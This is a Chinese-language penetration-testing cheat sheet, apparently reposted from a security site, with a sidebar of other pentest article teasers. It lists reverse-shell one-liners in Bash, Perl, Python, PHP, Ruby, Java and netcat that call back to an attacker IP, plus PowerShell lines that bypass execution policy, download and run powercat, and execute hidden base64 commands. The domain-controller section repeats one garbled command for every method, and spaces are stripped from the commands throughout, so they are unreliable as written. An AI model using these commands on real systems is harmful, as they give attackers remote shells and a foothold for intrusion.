内网域实战渗透常用命令

时间：2020-01-02 15:27:13 来源：作者：

一.查找域控的几种常用方法

1.net view

netdomquerypdc

2.set log

netdomquerypdc

3.通过srv记录

netdomquerypdc

4.使用nltest

netdomquerypdc

5.使用dsquery

netdomquerypdc

6.使用netdom

netdomquerypdc

注释：这些都是win系统自带的命令，有的时候win版本不同，有的命令会不存在，所以多一种方法，多一种成功的可能性，实际渗透，自行根据目标环境变换。

二.各种语言一句话反弹shell

Bash [不通用，跟linux发行版本有关，在ubuntu上测试成功]

bash-i>&/dev/tcp/10.0.0.1/80800>&1

PERL

perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'

Python

python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

php-r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh-i<&3>&32>&3");'

Ruby

ruby-rsocket-e'f=TCPSocket.open("10.0.0.1",1234).to_i;execsprintf("/bin/sh-i<&%d>&%d2>&%d",f,f,f)'

JAVA

r=Runtime.getRuntime()p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/2002;cat<&52=""|=""while=""read=""line;=""do=""$line="">&5>&5;done"]asString[])p.waitFor()

netcat

nc-e/bin/shx.x.x.x2333

但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncx.x.x.x2333>/tmp/f

三.常用Power shell命令

1.通过远程下载来执行

Set-ExecutionPolicyRemoteSignedIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

2.把ps脚本传到本地后执行

PowerShell.exe-epBypass-Filed:powercat.ps1

3.本地交互式执行

E:>PowerShell.exe-ExecutionPolicyBypassInvoke-PowerShellTcp-Reverse-IPAddress10.18.180.18-Port4444

4.把ps脚本编码成base64来执行[实战用的最多]

powershell-epbypass-NoLogo-NonInteractive-NoProfile-windowstyleHidden-encbase64加密过的命令

作者：Ms08067安全实验室转载注明：https://www.secpulse.com/archives/120372.html

Tags：渗透点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

APP渗透 | 解决安卓7+无法抓取数据包问题

公众号：白帽子左一领取配套练手靶场、安全全套课程及工具...前言在日常渗透项目中，app渗透可以说是家常便饭了。但由于安卓7以后不信任用户安装的证书，很多时候无法正常抓取数...【详细内容】

2021-12-07　　Tags: 渗透点击:(31)　　评论:(0)　　加入收藏

渗透测试小工具-sqlmate

简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】

2021-11-10　　Tags: 渗透点击:(44)　　评论:(0)　　加入收藏

APP渗透技巧 | 逆向app破解数据包sign值，实现任意数据重放添加

前言登场的目标虽不是SRC，但是整个漏洞的利用手法很有学习意义。目前在很多大厂的http数据包中都会添加sign值对数据包是否被篡改进行校验，而sign算法的破解往往是我们漏洞测...【详细内容】

2021-11-10　　Tags: 渗透点击:(91)　　评论:(0)　　加入收藏

一次授权的渗透测试

一：信息收集阶段因为目标是学校，一般会去考虑收集学号，教工号。因为有的登陆点需要此类信息，且密码存在规律性（身份证后六位，123456）。目标域名xxx.com【查看资料】开始的时候，我是...【详细内容】

2021-10-27　　Tags: 渗透点击:(47)　　评论:(0)　　加入收藏

黑客是如何搭建PHP渗透测试环境？

一、背景介绍Pikachu是一个带有各种漏洞的Web应用系统，这个系统是使用PHP搭建的，需要PHP环境和Mysql数据库支持。我们可以利用phpstudy在本地搭建这个渗透测试平台，如果你是一...【详细内容】

2021-10-09　　Tags: 渗透点击:(53)　　评论:(0)　　加入收藏

白帽黑客如何使用安卓木马渗透与远程控制安卓手机

一、知识点详解msfconsole，进入msf控制端show options，查看设置的ip地址和端口号是否写入run，根据写入的ip地址和端口号，开启监听服务help，在进入安卓手机的控制端，查看可以使用的...【详细内容】

2021-10-08　　Tags: 渗透点击:(63)　　评论:(0)　　加入收藏

APP渗透测试——APP抓包

一、准备环境Burpsuite、夜神模拟器二、步骤运行burpsuite，打开代理后，访问 http://burp/ 下载CA证书点击右上角位置下载CA证书将下载的CA证书导入到浏览器中，打开浏览器选择设...【详细内容】

2021-10-08　　Tags: 渗透点击:(67)　　评论:(0)　　加入收藏

内网渗透横向攻击流程

拓扑环境 Kali Linux（攻击机） Centos6.4（web服务器） win7（域成员主机无法上网） win2008R2（域控无法上网）目的通过Kali Linux拿到域控权限2021最新整理网络安全\渗透测试/安全学习（全...【详细内容】

2021-09-17　　Tags: 渗透点击:(90)　　评论:(0)　　加入收藏

网络安全学习：内网渗透案例，打破渗透瓶颈

前言这又是一个关于域内基础概念与原理的系列Active Directory 的查询基础语法BaseDNBaseDN 即基础可分辨名称，其指定了这棵树的根。比如指定 BaseDN 为DC=whoamianony,DC=or...【详细内容】

2021-09-06　　Tags: 渗透点击:(47)　　评论:(0)　　加入收藏

红队渗透工具集——探测

http 头部信息http头部信息经常包含着主机服务的一些版本信息，经常使用的字段信息有：Server, X-Powered-By, X-AspNet-Version工具可采用curl进行curl --location --head $URL...【详细内容】

2021-08-19　　Tags: 渗透点击:(227)　　评论:(0)　　加入收藏

▌简易百科推荐

德勤2021网络安全前瞻调研报告：网络安全，为未来赋能您的员工

（报告出品方：德勤）数字化转型网络安全及转型挑战在任何行业，保持竞争力都需要快速开发新产品和服务并推向市场。创新型业务模式不仅仅是简单地将现有流程数字化，其正在覆盖供应...【详细内容】

2021-12-22　　认是　　　　Tags:网络安全　点击:(29)　　评论:(0)　　加入收藏

为强力解决XSS跨站点脚本攻击，原生WEB安全API终于出现了

10月18号， W3C中网络平台孵化器小组（Web Platform Incubator Community Group）公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。网络安全中...【详细内容】

2021-12-07　　实战Java　　博客园　　Tags:脚本攻击　点击:(20)　　评论:(0)　　加入收藏

小白如何用防火墙规则和IP安全策略关闭危险端口

一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则，但是大家知道如何配置Windows入站出站规则吗？有哪些常见的危险端口呢？如何解决上述问题...【详细内容】

2021-12-01　　Kali与编程　　　　Tags:防火墙　点击:(30)　　评论:(0)　　加入收藏

网络攻击者最有可能攻击的IT资产列表

网络安全服务商Randori公司日前发布了一份调查报告，列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际，以及在网络安全(尤其是勒索软件和供应...【详细内容】

2021-10-28　　企业网D1net 　　企鹅号　　Tags:网络攻击　点击:(57)　　评论:(0)　　加入收藏

域内一个特权提升技巧

0x01.背景实验利用Dns Administrators 组成员，通过远程配置Dns服务，进行Dll inject从而实现特权提升。在域内，Dns server 通常为Dc Server,Dns服务器管理基于rpc，通过调用c:\wi...【详细内容】

2021-10-22　　IT影子　　　　Tags:特权提升　点击:(37)　　评论:(0)　　加入收藏

CSRF跨站请求伪造的安全防护

本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施，工作中有用到的朋友不妨收藏转发一下，以备您参考。什么是CSRF？CSRF跨站点请求伪造(Cross—Site Request...【详细内容】

2021-10-13　　快乐中恒　　　　Tags:CSRF 　点击:(49)　　评论:(0)　　加入收藏

如何绕过WAF和本地防火墙双重防护？

waf拦截在打某市 Hvv 第一天就找到一个文件上传的点，经过测试，可以直接任意文件上传，没有什么道理。直接尝试上传 Php 文件，被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】

2021-10-11　　KaliMa　　　　Tags:防火墙　点击:(56)　　评论:(0)　　加入收藏

Web 文件管理器elFinder 的漏洞链分析

应用程序与文件系统的交互始终是高度安全敏感的，因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确，其作用是复制完整文件系统的功能...【详细内容】

2021-09-17　　IT野涵　　　　Tags:漏洞链　点击:(56)　　评论:(0)　　加入收藏

iPhone 会被黑客入侵吗？

您的苹果手机尽管iPhone比Android更安全，但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序，并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】

2021-09-16　　Hackers爱好者　　　　Tags:黑客入侵　点击:(633)　　评论:(0)　　加入收藏

主备模式防火墙在网络里的布置方式

防火墙一般布置在逻辑区域的入口处，位于三层网络架构的核心和汇聚之间，起到隔离逻辑区域，为逻辑区域创建安全策略的作用。上面就是应用区的防火墙布置方式，他布置在应用区，可以...【详细内容】

2021-09-03　　知来知去　　　　Tags:主备模式防火墙　点击:(109)　　评论:(0)　　加入收藏

推荐资讯

聊聊如何自定义数据脱	河南人到底有多爱吃面
人称“犬中四煞”的4	离婚后，约定每月给孩子
“三皇五帝”分别是哪	印度低种姓群体如何翻
日本研发“飞行摩托”	2021年Steam最畅销游